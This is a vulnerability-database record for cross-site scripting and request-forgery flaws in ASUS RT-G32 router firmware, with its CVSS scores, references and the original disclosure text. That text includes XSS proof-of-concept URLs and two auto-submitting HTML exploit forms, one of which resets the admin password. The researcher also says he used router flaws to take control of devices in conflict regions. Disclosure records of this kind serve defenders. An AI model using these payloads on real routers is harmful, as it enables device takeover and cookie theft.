VAR-201503-0303
Vulnerability from variot - Updated: 2023-12-18 12:38Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information.
Details:
Cross-Site Scripting (WASC-08):
http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
These vulnerabilities work as via GET, as via POST (work even without authorization).
ASUS RT-G32 XSS-1.html
ASUS RT-G32 XSS exploit (C) 2015 MustLiveCross-Site Request Forgery (WASC-09):
CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth).
ASUS RT-G32 CSRF-1.html
ASUS RT-G32 CSRF exploit (C) 2015 MustLiveI found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/).
Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201503-0303",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 2.5,
"vendor": "asus",
"version": "2.0.3.2"
},
{
"model": "rt-g32",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.2.6"
},
{
"model": "rt-g32",
"scope": "eq",
"trust": 0.8,
"vendor": "asustek computer",
"version": "2.0.3.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:asus:rt-g32_firmware:2.0.2.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:asus:rt-g32_firmware:2.0.3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "MustLive",
"sources": [
{
"db": "BID",
"id": "73296"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 0.4
},
"cve": "CVE-2015-2681",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2015-2681",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-01955",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-80642",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-2681",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-01955",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201503-426",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-80642",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. \nAn attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. \n\n----------\nDetails:\n----------\n\nCross-Site Scripting (WASC-08):\n\nhttp://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27\n\nhttp://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27\n\nhttp://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27\n\nThese vulnerabilities work as via GET, as via POST (work even without\nauthorization). \n\nASUS RT-G32 XSS-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 XSS exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"next_page\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"group_id\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"action_script\"\nvalue=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003cinput type=\"hidden\" name=\"flag\" value=\"\u0027+alert(document.cookie)+\u0027\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nCross-Site Request Forgery (WASC-09):\n\nCSRF vulnerability allows to change different settings, including admin\u0027s\npassword. As I showed in this exploit (post-auth). \n\nASUS RT-G32 CSRF-1.html\n\n\u003chtml\u003e\n\u003chead\u003e\n\u003ctitle\u003eASUS RT-G32 CSRF exploit (C) 2015 MustLive\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody onLoad=\"document.hack.submit()\"\u003e\n\u003cform name=\"hack\" action=\"http://site/start_apply.htm\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"http_passwd2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"v_password2\" value=\"admin\"\u003e\n\u003cinput type=\"hidden\" name=\"action_mode\" value=\"+Apply+\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n\nI found this and other routers since summer to take control over terrorists\nin Crimea, Donetsk \u0026 Lugansks regions of Ukraine. Read about it in the list\n(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)\nand in many my interviews\n(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). \n\nI mentioned about these vulnerabilities at my site\n(http://websecurity.com.ua/7644/). \n\nBest wishes \u0026 regards,\nMustLive\nAdministrator of Websecurity web site\nhttp://websecurity.com.ua \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "PACKETSTORM",
"id": "130724"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2681",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "130724",
"trust": 3.2
},
{
"db": "BID",
"id": "73296",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2015-01955",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-80642",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"id": "VAR-201503-0303",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
}
],
"trust": 1.12424244
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
}
]
},
"last_update_date": "2023-12-18T12:38:03.539000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-G32",
"trust": 0.8,
"url": "http://www.asus.com/networking/rtg32/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://websecurity.com.ua/7644/"
},
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2015/mar/42"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/73296"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2681"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2681"
},
{
"trust": 0.3,
"url": "http://www.asus.com/"
},
{
"trust": 0.3,
"url": "http://www.asus.com/networking/rtg32/"
},
{
"trust": 0.1,
"url": "http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://websecurity.com.ua/7644/)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html)."
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27"
},
{
"trust": 0.1,
"url": "http://site/start_apply.htm\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "VULHUB",
"id": "VHN-80642"
},
{
"db": "BID",
"id": "73296"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"db": "PACKETSTORM",
"id": "130724"
},
{
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"date": "2015-03-23T00:00:00",
"db": "VULHUB",
"id": "VHN-80642"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73296"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"date": "2015-03-07T11:11:11",
"db": "PACKETSTORM",
"id": "130724"
},
{
"date": "2015-03-23T16:59:09.523000",
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"date": "2016-12-03T00:00:00",
"db": "VULHUB",
"id": "VHN-80642"
},
{
"date": "2015-03-24T00:00:00",
"db": "BID",
"id": "73296"
},
{
"date": "2015-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-001914"
},
{
"date": "2016-12-03T03:05:42.517000",
"db": "NVD",
"id": "CVE-2015-2681"
},
{
"date": "2015-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asus RT-G32 Router Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-01955"
},
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201503-426"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…